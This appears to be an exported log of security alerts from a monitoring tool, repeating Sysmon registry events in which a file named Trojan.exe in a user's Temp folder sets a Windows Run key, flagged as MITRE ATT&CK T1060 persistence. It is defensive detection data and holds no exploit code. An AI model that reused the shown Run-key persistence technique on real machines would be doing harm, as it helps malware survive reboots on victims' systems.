HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:51.665"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:03.789",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:50.649 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:50.674907300Z"",""eventRecordID"":""1075"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:50.649\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:50.649"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:02.742",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:49.633 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:49.642767700Z"",""eventRecordID"":""1074"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:49.633\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:49.633"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:01.742",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:48.602 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:48.620489100Z"",""eventRecordID"":""1073"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:48.602\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:48.602"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:00.726",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:47.573 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:47.578628700Z"",""eventRecordID"":""1071"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:47.573\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:47.573"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:59.681",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:46.569 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:46.575411100Z"",""eventRecordID"":""1070"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:46.569\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:46.569"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:58.686",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:45.539 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:45.558946700Z"",""eventRecordID"":""1069"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:45.539\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:45.539"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:18:57.640",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:44.523 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:44.529430400Z"",""eventRecordID"":""1068"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:44.523\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:44.523"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:56.647",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:43.507 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:43.510588800Z"",""eventRecordID"":""1067"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:43.507\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:43.507"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:55.601",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:42.476 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:42.478269600Z"",""eventRecordID"":""1066"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:42.476\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:42.476"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:18:54.568",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:41.445 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:41.452858000Z"",""eventRecordID"":""1065"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:41.445\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:41.445"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:53.590",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:40.413 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:40.415509300Z"",""eventRecordID"":""1064"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:40.413\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
